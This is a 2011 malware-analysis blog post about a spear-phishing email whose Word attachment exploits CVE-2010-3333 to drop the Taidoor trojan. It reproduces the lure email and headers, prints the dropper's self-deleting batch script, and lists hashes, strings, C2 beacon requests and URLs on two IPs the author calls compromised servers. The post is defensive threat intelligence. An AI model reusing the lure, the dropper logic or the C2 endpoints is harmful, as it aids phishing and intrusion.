Monday, June 13, 2011

May 31 CVE-2010-3333 DOC Q and A.doc compromised louisvilleheartsurgery.com w Trojan Taidoor

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3333 Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability

  General File Information

File Q and A.doc
File Size 115755 bytes
MD5 46863c6078905dab6fd9c2a480e30ad0
Distribution Email Attachment

 The trojan within a word document was sent via mail.louisvilleheartsurgery.com (66.147.51.202), which appears to be a legitimate mail server of University of Louisville surgery program, which is outsourced to/hosted at Nuvox / Windstream Email hosting. The server must be misconfigured or compromised and is being actively used as a relay for phishing.(I have other examples of phish mail sent via that server - pretty much everything is the same - note additional C2 ip in this post) Jun 1 CVE-2010-3333 DOC 2011 Insider's Guide to Military Benefits from compromised louisvilleheartsurgery.com w Trojan Taidoor


Download

Original Message



-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com]
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest

Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below.  Article appeared as a straight Q and A story, everything reads balanced and fair.  Please let me know if you have any questions or concerns.

V/r,
Courtney

The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.

Message Headers

Received: (qmail 9019 invoked from network); 1 Jun 2011 03:22:45 -0000
Received: from mail.louisvilleheartsurgery.com (HELO ucsamd.com) (66.147.51.202)
  by xxxxxxxxxxxxxx 1 Jun 2011 03:22:45 -0000
Received: from UCSADC1 ([192.168.20.2]) by ucsamd.com with Microsoft SMTPSVC(6.0.3790.4675);
     Tue, 31 May 2011 23:22:44 -0400
Subject: Defense News article of interest
Date: Tue, 31 May 2011 23:22:44 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0009_01CC1F7C.2776BAC0"
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4721
From: "CDR Courtney Bricks"
To: xxxxxxxxxxxxxxxxx
X-Mailer: Microsoft Outlook, Build 10.0.2627
Return-Path: cbricks@gmail.com
Message-ID:
X-OriginalArrivalTime: 01 Jun 2011 03:22:44.0719 (UTC) FILETIME=[2C51CFF0:01CC200B]

Sender

IP numbers of host (1) 66.147.51.202
PTRs of IP numbers (1) mail.louisvilleheartsurgery.com
Host names sharing IP with A records (1) mail.louisvilleheartsurgery.com
A of PTR of A (1) 66.147.51.202
The sender email address was used cbricks@gmail.com , which is a spoof of gmail 
  


Automated Scans

Q and A.doc
Submission date: 2011-06-13 21:29:45 (UTC)
Result: 19 /42 (45.2%)
http://www.virustotal.com/file-scan/report.html?id=0ad44b7a627f801cb92ffd73f63fc4d5d815ee225ba31bd5b1ed4906e94df365-1308000585
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.06.14.00 2011.06.13 Dropper/Cve-2010-3333
AntiVir 7.11.9.167 2011.06.13 EXP/CVE-2010-3333
Avast 4.8.1351.0 2011.06.13 RTF:CVE-2010-3333
Avast5 5.0.677.0 2011.06.13 RTF:CVE-2010-3333
BitDefender 7.2 2011.06.13 Exploit.RTF.Gen
ClamAV 0.97.0.0 2011.06.13 BC.Exploit.CVE_2010_3333
Commtouch 5.3.2.6 2011.06.13 CVE-2010-3333!Camelot
DrWeb 5.0.2.03300 2011.06.13 Exploit.Rtf.based
Emsisoft 5.1.0.8 2011.06.13 Exploit.Win32.CVE-2010!IK
Fortinet 4.2.257.0 2011.06.13 Data/CVE20103333.A!exploit
GData 22 2011.06.13 Exploit.RTF.Gen
Ikarus T3.1.1.104.0 2011.06.13 Exploit.Win32.CVE-2010
Microsoft 1.6903 2011.06.13 Exploit:Win32/CVE-2010-3333
NOD32 6204 2011.06.13 Win32/Exploit.CVE-2010-3333
PCTools 7.0.3.5 2011.06.10 HeurEngine.MaliciousExploit
Symantec 20111.1.0.186 2011.06.13 Bloodhound.Exploit.366
TrendMicro 9.200.0.1012 2011.06.13 TROJ_ARTIEF.AF
TrendMicro-HouseCall 9.200.0.1012 2011.06.13 TROJ_ARTIEF.AF
VIPRE 9574 2011.06.13 Exploit.MSWord.CVE-2010-3333.c (v)
MD5   : 46863c6078905dab6fd9c2a480e30ad0

Created files

 This appears to be a fairly common trojan ,  it is characterized by traffic it generates  -


http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D
http://aaaaa/bbbbb.php?id=xxxxxxyyyyyyyyyyyy where
aaaaa is a host or domain
bbbbb is a 5 char string
xxxxxx is a 6 char changing string
yyyyyyyyyyyy - 12 char more or less constant string

 Created files

%Temp%\1.doc 36555046056B10DFC0552A28A364FF73
%Temp%\~DF3055.bat 4F1EAB340D9D94DA279B9D076EEE23CB
%Temp%\~Svchost.exe  5EA58C5F12405A4E959234134123380D

created and deleted files
%userprofile%\desktop\~winhlp.tmp  D679CFCD2096E351DBBBB968B52B6C3C
 All Users\Application Data\iosys 9032D61FCAFEC94C2C52B38B9383A86C


iosys - the trojan dropper
iosys gets dropped by the original word document in the same location.  It creates all other files mentioned in the Created Files section of this post.
Files added
----------------------------------
C:\WINDOWS\Prefetch\IOSYS.EXE-078F7196.pf  - iosys runs
C:\Documents and Settings\mila\Local Settings\Temp\1.doc  - creates clean decoy file
C:\Documents and Settings\mila\Local Settings\Temp\~DF3055.bat - creates batch file
C:\Documents and Settings\mila\Local Settings\Temp\~Svchost.exe  - creates ~Svchost.exe


Files deleted
----------------------------------
C:\Documents and Settings\mila\Desktop\iosys   ~DF3055.bat batch file deletes iosys and itself


iosys
iosys
Result: 14/ 42 (33.3%)
http://www.virustotal.com/file-scan/report.html?id=0bc5a0f0971b7f7221e81fbda2846f049db7cd512b469e4d25d5edaecee14964-1308000839
AntiVir 7.11.9.167 2011.06.13 TR/Hijacker.Gen
Avast 4.8.1351.0 2011.06.13 Win32:Malware-gen
Avast5 5.0.677.0 2011.06.13 Win32:Malware-gen
AVG 10.0.0.1190 2011.06.13 Generic22.BYWE.dropper
BitDefender 7.2 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
DrWeb 5.0.2.03300 2011.06.13 Trojan.Taidoor
GData 22 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
Kaspersky 9.0.0.837 2011.06.13 Trojan.Win32.Sasfis.bkxq
Microsoft 1.6903 2011.06.13 VirTool:Win32/Injector.gen!BJ
NOD32 6204 2011.06.13 probably a variant of Win32/Injector.GUH
Norman 6.07.10 2011.06.13 W32/Malware.TJAQ.dropper
nProtect 2011-06-13.02 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
Sophos 4.66.0 2011.06.13 Troj/Mdrop-DMI
VBA32 3.12.16.1 2011.06.13 TrojanDownloader.Rubinurd.f
MD5   : 9032d61fcafec94c2c52b38b9383a86c


Some strings from iosys

 f!?K
G(R%
Ja5s3
wXOO?
V/_z
>d/R(
ntdll.dll
NtUnmapViewOfSection
%s "%s"
exe.secivres
abcde
W[SO
KSKS
s_K7#
s_K7#
s_K7#
s_K7#
s_K7#
s_K7#
s_K7#
s_K7#
s_K7#
xushfc
 & 6"
1.doc
Dwf.qc`

Unicode Strings:
---------------------------------------------------------------------------
(null)
         (((((                  H
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Adobe Systems, Inc.
FileDescription
Adobe? Flash? Player Installer/Uninstaller 10.1 r53
FileVersion
10,1,53,64
InternalName
Adobe? Flash? Player Installer/Uninstaller 10.1
LegalCopyright
Copyright ? 1996-2010 Adobe, Inc.
LegalTrademarks
Adobe? Flash? Player
OriginalFilename
FlashUtil.exe
ProductName
Flash? Player Installer/Uninstaller
ProductVersion
10,1,53,64
VarFileInfo
Translation
Root Entry
SummaryInformation
DocumentSummaryInformation
WordDocument
FCAA-VA Meeting
Cstro3
Normal.dotm
Lura Harrison
Microsoft Office Word
Fairfax County Government
KSOProductBuildVer
2052-6.6.0.2461
Footer Char
Balloon Text Char
0Table
Data
Defense News article of interest
Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below.  Article appeared as a straight Q and A story, everything reads balanced and fair.  Please let me know if you have any questions or concerns.
V/r,
Courtney
The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.
Q. How are you going to cut the budget for 2013?
A. First of all, we have not received fiscal guidance yet for POM 13 [Program Objective Memorandum]. We expect it momentarily. The way that this will work is the Navy and the Marines have been working on an expected top line which was based on last year's submission, the POM 12 submission, and that is due into the Department of the Navy on the 2nd of May. Then we will have three months to prepare the budget and turn it over to the Department of Defense, and then we'll go through the budget review throughout the rest of the year like we normally do. So we're expecting to get top level guidance here within the next week.
The Navy and the Marine Corps will refine their plans based on the gui
ance and will continually refine them until the 30th of July or so when it is due to the secretary of defense. So I'm expecting the numbers will change slightly, over time depending on how the budget negotiations go on the Hill, and we'll just adjust accordingly.
Q. Arguably, you haven't taken a major swipe at cutting your budget yet.
A. No, we're still operating under the fiscal guidance that's in right now. Of course if we get a year-long continuing resolution or if we get a bill for 2011, then we'll have to see what the impacts will be on '12 and make adjustments there. It's extremely fluid and flexible. I can't recall a time where we've been so deep in the fiscal year without a budget. And Congress hasn't even turned its attention to the 2012 budget, which under normal rules would be passed around the October time frame. We're in such an uncertain environment right now that talking about the budget really is not fruitful.
Q. Japan is still dealing with fallout from the earthquake and tsunami, and concerns about radiation from the destroyed Fukushima nuclear reactors recently caused the U.S. to send the Yokosuka-based aircraft carrier George Washington to sea, right in the middle of an overhaul. Has a decision been made about where the ship's going to go? Will the disasters affect the future of the Navy's Forward-Deployed Naval Forces in Japan?
A. We believe the FDNF will remain and that we will have a strong presence in Japan after this terrible disaster. We are getting more and more of our experts into Japan to help on the remediation. As far as I know, there has been no indication at all, and no discussion at all on the future of FDNF. It's to be assumed it will remain. [The question of where the George Washington will go hasn't] been resolved yet. A lot is going to depend on the mediation of the nuclear plants. Everyone's taking a look at this problem and trying to determine the best way to resolve it.
Q. The Marines are thinking ahead to where they're going to be post-Afghanistan. How do you see the shape of the Corps ten years from now?
A. The Corps structure review group that was set up by Commandant Gen. James Amos has finished. It was a bottom-up review to look at all the different things they were told to in the most recent quadrennial defense review and defense planning guidance. They come up with the 186,800 person Marine Corps. Now, they're a force of readiness. That's their key role. And the Secretary of Defense endorsed that role.
The plan is, depending on resources of course, to be manned very close to 100 percent as possible. They would have an entirely modernized and upgraded ground mobility portfolio based on two new systems - the Marine Corps personnel carrier and the new amphibious vehicle. Our hope is that we can get have eight battalions of the new amphibious vehicle and four battalions of the Marine personnel carrier.
The Marines have already dropped the total number of vehicles in their Marine Air-Ground Task Force, forcewide, from 42,000 to about 32,500, and they did that by essentially matching butts to seats. And they said how do we keep mobility in the ground force? They are looking at their joint light tactical fleet, what's the best way forward, should it be the Joint Light Tactical Vehicle or should there be some other option? They've looked at their medium truck fleet. I think they're in real good shape.
Aviation looks very bright. The secretary, the commandant and I are very confident that the engineering problems on the F-35B Joint Strike Fighter are going to be resolved. The Marines have made a decision to put five F-35C [carrier variant] squadrons aboard carriers, so they have lined up about 21 active squadrons, five of them C's, the remainder of them B's.
[Development of] the CH-53K [heavy-lift helicopter] is moving right along, and we're extremely happy with the AH-1Z [attack helicopters] and the UH-1Y [utility helicopter].
So when we take a look at a force in readiness, able to come from the sea, the plan is in place for a thoroughly modernized Marine Corps and thoroughly ready Marine Corps, going back to its naval roots and its amphibious heritage.
Q. Is naval fire support something in need of a solution or is the current capability acceptable?
A. In '13, we hope to take a look again at the 5-inch guided round, but the 6-inch guided round, the 155mm is going well. It's already met its threshold in range. The plans are to have three DDG 1000 destroyers carrying
six of those systems.
We have an awful lot of 5-inch cannons in the fleet and if we can solve the 5-inch round problem, then the combination of the 6-inch rounds, 5-inch rounds and air-delivered ordnance is going to be plenty for any foreseeable contingencies.
Q. Production of LPD 17 San Antonio-class amphibious transport dock ships is continuing, with half the class is already in service and the sixth ship to be delivered this summer. Every previous ship has had problems to varying degrees. Shipbuilder Huntington-Ingalls Industries (HII) would really like to deliver a good ship, but they haven't done so yet. Do you see anything on this next ship that gives you hope?
A. We've had an awful lot of problems with the class, but the most recent ships are coming in in much better shape. We're still working with HII, we still want to see quality improve. As quality improves we expect scheduling and costs to improve.
But we're very satisfied with the basic design of the ship. Workmanship is getting better. We just awarded LPD 26 to HII, LPD 27 is a 2012 ship, and we'll start to worry about that once the budget is settled.
Sailors and Marines can't say enough about [the ships]. [U.S. Fleet Forces commander] Adm. John Harvey spends an awful lot of time trying to get that ship and the wellness of that class right and I think we've made great strides in doing so.
Q. Huntington Ingalls now has been set up as an independent entity, separated from Northrop Grumman. Are you happy with what you've seen so far with HII? What are you looking for from them in the future?
A. We're very happy that we have two yards that build surface combatant ships and two builders that build submarines. We think that's very healthy for the nation and for the Navy. We want to move for competition whenever possible.
We're extremely happy on the spin out. We spent a lot of time trying to determine if HII was going to be viable and I think, as it's been explained, we have the base case and the stress case. We put HII under an awful lot of stress. We assumed that almost all of the ships from '11, all five of the ships under construction, would have marginal performance at the same time, and that we would take the carrier to maximum speed. We stressed everything. We're working hard with HII on quality control issues, and they are extremely motivated to make this thing work.
We're very happy that we have done due diligence, and we think that HII is in as good a place as possible. [Shipyard chief] Mike Petters is exactly right, they have to focus on performance, specifically quality. If the quality goes up, then the costs go down, and the schedule gets back on. I think Mike is focused on exactly the right thing and we're going to do everything we can to work with HII to make sure they're successful.
Q. The biggest ship they're building right now on the Gulf coast is the assault ship America (LHA 6). Will there be another lha without a well deck and an aviation version of that ship or is that going to be a one-off ship?
A. Nope, there will be two ships. LHA 7 will not have a well deck on it, and we'll have two aviation-capable ships.
Our intent is for LHA 8, which right now is a 2016 ship, to have a well deck in it. We're doing an analysis to determine the best and most inexpensive way for us to achieve that. Is it a repeat of the LHA 8 Makin class or is it an LHA with a well deck inserted into it? It's not going to be a completely newly-designed ship. It'll be a mod repeat of some type with a well deck in it.
PAGE
PAGE
List Paragraph
Times New Roman
Cambria Math
Symbol
Arial
Courier New
Wingdings
Tahoma
Normal.dotm
FCAA-VA Meeting
Cstro3
Lura Harrison
Z&!),.:;?]}


1.doc - decoy clean file


The document properties
FCAA-VA Meeting
Cstro3
Lura Harrison FCAA-VA Meeting, indicating that it was created by Fairfax County Government, however, the custom tab shows KSOProductBuildVer, which means it was created using Kingsoft Office

Kingsoft Office, commonly known simply as KSO, developed by Zhuhai based Chinese software developer Kingsoft, is an alternative to Microsoft Office. The product has had a long history of development in China, where it is still sold as WPS Office. "Kingsoft Office" is the company's attempt to crack, primarily, the Western and Japanese markets. Since Kingsoft Office 2005, the user interface bears resemblance to the Microsoft Office products, and the suite reads and writes the files generated by Office in addition to its native documents. The personal edition is free for download.

~DF3055.bat and winhp.tmp

contents of the file:
@echo off
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
 ....
@echo 123>>~winhp.tmp repeated exactly 1000 times
 .....
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@del ~winhp.tmp
del "c:\docume~1\alluse~1\applic~1\iosys"
"C:\DOCUME~1\mila\LOCALS~1\Temp\5.doc"
"C:\DOCUME~1\mila\LOCALS~1\Temp\~Svchost.exe"
del %0
@exit
 ~winhp.tmp contains nothing but 1000 row of 123. Reasons unclear, perhaps some sort of timer

 ~Svchost.exe
~Svchost.exe
Submission date: 2011-06-13 21:48:47 (UTC)
Current status: queued (#36) queued analysing finished
Result: 22/ 42 (52.4%)
http://www.virustotal.com/file-scan/report.html?id=bb40b1e17e37e0fba0f40d42d2064e97d32cb20f1fc3ea49f33781c570182196-1308001727
AhnLab-V3 2011.06.14.00 2011.06.13 Win-Trojan/Injector.17925.E
AntiVir 7.11.9.167 2011.06.13 TR/Crypt.ZPACK.Gen
Avast 4.8.1351.0 2011.06.13 Win32:Malware-gen
Avast5 5.0.677.0 2011.06.13 Win32:Malware-gen
AVG 10.0.0.1190 2011.06.13 Generic22.BYWE
BitDefender 7.2 2011.06.13 Trojan.CryptRedol.Gen.3
DrWeb 5.0.2.03300 2011.06.13 Trojan.Taidoor
F-Secure 9.0.16440.0 2011.06.13 Trojan.CryptRedol.Gen.3
Fortinet 4.2.257.0 2011.06.13 W32/Sasfis.BKXQ!tr
GData 22 2011.06.13 Trojan.CryptRedol.Gen.3
Ikarus T3.1.1.104.0 2011.06.13 Trojan.SuspectCRC
Kaspersky 9.0.0.837 2011.06.13 Trojan.Win32.Sasfis.bkxq
Microsoft 1.6903 2011.06.13 VirTool:Win32/Injector.gen!BJ
NOD32 6204 2011.06.13 Win32/TrojanDownloader.Agent.PTT
Norman 6.07.10 2011.06.13 W32/Malware.TJAQ
nProtect 2011-06-13.02 2011.06.13 Trojan.CryptRedol.Gen.3
Panda 10.0.3.5 2011.06.13 Trj/CI.A
PCTools 7.0.3.5 2011.06.10 Trojan.Gen
Rising 23.62.00.03 2011.06.13 Suspicious
Sophos 4.66.0 2011.06.13 Troj/Mdrop-DMI
Symantec 20111.1.0.186 2011.06.13 Suspicious.Cloud.5
VBA32 3.12.16.1 2011.06.13 TrojanDownloader.Rubinurd.f
MD5   : 5ea58c5f12405a4e959234134123380d

Strings excerpt

V/_z
>d/R(
ntdll.dll
NtUnmapViewOfSection
%s "%s"
exe.secivres
abcde

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Adobe Systems, Inc.
FileDescription
Adobe? Flash? Player Installer/Uninstaller 10.1 r53
FileVersion
10,1,53,64
InternalName
Adobe? Flash? Player Installer/Uninstaller 10.1
LegalCopyright
Copyright ? 1996-2010 Adobe, Inc.
LegalTrademarks
Adobe? Flash? Player
OriginalFilename
FlashUtil.exe
ProductName
Flash? Player Installer/Uninstaller
ProductVersion
10,1,53,64
VarFileInfo
Language code of the file is displayed as English - United States en-us 1033 but the language ID is actually Chinese Simplified     (The language ID is a word integer value made up of a primary language and its sublanguage which is defined by Windows. If the resource item is “language neutral” then this value is zero.)





Traffic

CnC server - traffic abs
Download pcap file here
SSL to / from 99.1.23.71:443  and 65.87.199.102:443
examples 

GET /fvlbk.php?id=012943191138FEBC54 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 99.1.23.71
Connection: Keep-Alive
Cache-Control: no-cache

From threatexpert

http://99.1.23.71:443/epzkq.php?id=018399121212121212
http://99.1.23.71:443/vkreb.php?id=017322121212121212
http://65.87.199.102:443/vkreb.php?id=020437121212121212


Other examples from the previous post are

GET /wmssk.php?id=016180191138FEBC54 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 99.1.23.71
Connection: Keep-Alive
Cache-Control: no-cache 
GET /ldtxh.php?id=011340111D30541B71 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 99.1.23.71
Connection: Keep-Alive
   
99.1.23.71 appears to be a compromised IIS server used as CnC , which belongs to  Sun Country Medical Equipment

99.1.23.64 - 99.1.23.71
SUN COUNTRY MEDICAL EQUIPMENT-080827115120
Private Address
Plano, TX 75075 United States 
IPAdmin ATT Internet Services
+1-800-648-1626
ipadmin@att.com
IPAdmin ATT Internet Services
+1-800-648-1626
ipadmin@att.com

SBC-99-1-23-64-29-0808275145
Created: 2008-08-27
Updated: 2011-03-19
Source: whois.arin.net


65.87.199.102  - appears to be a compromised server used as CnC  - hosting webserver from Gatortech.com, hosting and small business outsource company
vortex.gatortech.com
ISP:    Synergy Networks
Organization:    Synergy Networks
Proxy:    None detected
Type:    Corporate
Assignment:    Static IP
Blacklist:   
Geolocation Information
Country:    United States us flag
State/Region:    Florida
City:    Naples
 http://www.robtex.com/ip/65.87.199.102.html

65.87.199.102 Dudleycarson.com, sarasota-gulfcoast.com, yourhometownsweethearts.com, allstarrealtytony.com, rightwaysales.com and at least 63 other hosts point to 65.87.199.102.

  From Threat expert report
File System Modifications
The following file was created in the system:
#Filename(s)File SizeFile Hash
1 [file and pathname of the sample #1] 17,925 bytes MD5: 0x5EA58C5F12405A4E959234134123380D
SHA-1: 0xB5C466CB36FEA327DA8B3DAF13E3CAE5EBB05DF6
China
  • The data identified by the following URLs was then requested from the remote web server:
    • http://99.1.23.71:443/iiohf.php?id=029590121212121212
    • http://65.87.199.102:443/iiohf.php?id=024326121212121212
    • http://99.1.23.71:443/figuq.php?id=025431121212121212
    • http://65.87.199.102:443/figuq.php?id=017975121212121212
    • http://99.1.23.71:443/heisp.php?id=014218121212121212
    • http://65.87.199.102:443/heisp.php?id=013836121212121212
    • http://99.1.23.71:443/qtcbv.php?id=022665121212121212
    • http://65.87.199.102:443/qtcbv.php?id=003529121212121212
    • http://99.1.23.71:443/hlobe.php?id=004518121212121212
    • http://65.87.199.102:443/hlobe.php?id=009835121212121212
    • http://99.1.23.71:443/epzkq.php?id=018399121212121212
    • http://65.87.199.102:443/epzkq.php?id=012316121212121212
    • http://99.1.23.71:443/tlhdt.php?id=015598121212121212
    • http://65.87.199.102:443/tlhdt.php?id=026804121212121212
    • http://99.1.23.71:443/vyqld.php?id=024007121212121212
    • http://65.87.199.102:443/vyqld.php?id=008414121212121212
    • http://99.1.23.71:443/ttlvm.php?id=013126121212121212
    • http://65.87.199.102:443/ttlvm.php?id=022955121212121212
    • http://99.1.23.71:443/vocpb.php?id=011307121212121212
    • http://65.87.199.102:443/vocpb.php?id=006291121212121212
    • http://99.1.23.71:443/ixoga.php?id=008375121212121212
    • http://65.87.199.102:443/ixoga.php?id=019758121212121212
    • http://99.1.23.71:443/mrhfu.php?id=029330121212121212
    • http://65.87.199.102:443/mrhfu.php?id=010690121212121212
    • http://99.1.23.71:443/uklxd.php?id=002815121212121212
    • http://65.87.199.102:443/uklxd.php?id=008982121212121212
    • http://99.1.23.71:443/mwmco.php?id=031260121212121212
    • http://65.87.199.102:443/mwmco.php?id=028267121212121212
    • http://99.1.23.71:443/mnopi.php?id=028612121212121212
    • http://65.87.199.102:443/mnopi.php?id=023566121212121212
    • http://99.1.23.71:443/janim.php?id=006088121212121212
    • http://65.87.199.102:443/janim.php?id=030408121212121212
    • http://99.1.23.71:443/vkreb.php?id=017322121212121212
    • http://65.87.199.102:443/vkreb.php?id=020437121212121212
    • http://99.1.23.71:443/ashlg.php?id=002182121212121212
    • http://65.87.199.102:443/ashlg.php?id=016018121212121212
    • http://99.1.23.71:443/ygzad.php?id=011976121212121212
    • http://65.87.199.102:443/ygzad.php?id=020329121212121212
    • http://99.1.23.71:443/bpomm.php?id=020982121212121212
    • http://65.87.199.102:443/bpomm.php?id=002109121212121212
    • http://99.1.23.71:443/rjjoe.php?id=008994121212121212
    • http://65.87.199.102:443/rjjoe.php?id=015622121212121212
    • http://99.1.23.71:443/cslvv.php?id=028657121212121212
    • http://65.87.199.102:443/cslvv.php?id=009700121212121212
    • http://99.1.23.71:443/vghtg.php?id=002106121212121212
    • http://65.87.199.102:443/vghtg.php?id=018698121212121212
    • http://99.1.23.71:443/kbyny.php?id=010796121212121212
    • http://65.87.199.102:443/kbyny.php?id=032222121212121212
    • http://99.1.23.71:443/ypanf.php?id=017108121212121212
    • http://65.87.199.102:443/ypanf.php?id=024083121212121212
    • http://99.1.23.71:443/gmvrl.php?id=018065121212121212
    • http://65.87.199.102:443/gmvrl.php?id=003381121212121212
    • http://99.1.23.71:443/xtjan.php?id=027263121212121212
    • http://65.87.199.102:443/xtjan.php?id=010227121212121212
    • http://99.1.23.71:443/ofypv.php?id=015393121212121212
    • http://65.87.199.102:443/ofypv.php?id=023673121212121212
    • http://99.1.23.71:443/luiae.php?id=005768121212121212
    • http://65.87.199.102:443/luiae.php?id=022611121212121212
    • http://99.1.23.71:443/ksycs.php?id=024451121212121212
    • http://65.87.199.102:443/ksycs.php?id=023453121212121212
    • http://99.1.23.71:443/ydtff.php?id=025174121212121212
    • http://65.87.199.102:443/ydtff.php?id=010519121212121212
    • http://99.1.23.71:443/vskti.php?id=003464121212121212
    • http://65.87.199.102:443/vskti.php?id=030690121212121212
    • http://99.1.23.71:443/tzdhx.php?id=011630121212121212
    • http://65.87.199.102:443/tzdhx.php?id=028644121212121212
    • http://99.1.23.71:443/qgzrs.php?id=026953121212121212
    • http://65.87.199.102:443/qgzrs.php?id=002819121212121212
    • http://99.1.23.71:443/gjyxf.php?id=015749121212121212
    • http://65.87.199.102:443/gjyxf.php?id=012118121212121212
    • http://99.1.23.71:443/nhfwt.php?id=010929121212121212
    • http://65.87.199.102:443/nhfwt.php?id=003353121212121212
    • http://99.1.23.71:443/uokpr.php?id=022892121212121212
    • http://65.87.199.102:443/uokpr.php?id=016839121212121212
    • http://99.1.23.71:443/tfbop.php?id=001928121212121212
    • http://65.87.199.102:443/tfbop.php?id=019181121212121212
    • http://99.1.23.71:443/mctvb.php?id=016834121212121212
    • http://65.87.199.102:443/mctvb.php?id=020153121212121212
    • http://99.1.23.71:443/qkyqc.php?id=017507121212121212
    • http://65.87.199.102:443/qkyqc.php?id=022713121212121212
    • http://99.1.23.71:443/balzi.php?id=010407121212121212
    • http://65.87.199.102:443/balzi.php?id=001853121212121212
    • http://99.1.23.71:443/nacey.php?id=017409121212121212
    • http://65.87.199.102:443/nacey.php?id=007558121212121212
    • http://99.1.23.71:443/udgnd.php?id=000997121212121212
    • http://65.87.199.102:443/udgnd.php?id=030448121212121212
    • http://99.1.23.71:443/lwcnf.php?id=019193121212121212
    • http://65.87.199.102:443/lwcnf.php?id=013732121212121212
    • http://99.1.23.71:443/zlkqq.php?id=023888121212121212
    • http://65.87.199.102:443/zlkqq.php?id=024162121212121212
    • http://99.1.23.71:443/goydj.php?id=029390121212121212
    • http://65.87.199.102:443/goydj.php?id=006897121212121212
    • http://99.1.23.71:443/adljt.php?id=011083121212121212
    • http://65.87.199.102:443/adljt.php?id=022793121212121212
    • http://99.1.23.71:443/bzymc.php?id=017084121212121212
    • http://65.87.199.102:443/bzymc.php?id=004077121212121212
    • http://99.1.23.71:443/otcvx.php?id=020400121212121212
    • http://65.87.199.102:443/otcvx.php?id=021512121212121212
    • http://99.1.23.71:443/yjzbo.php?id=026078121212121212
    • http://65.87.199.102:443/yjzbo.php?id=018125121212121212


No comments:

Post a Comment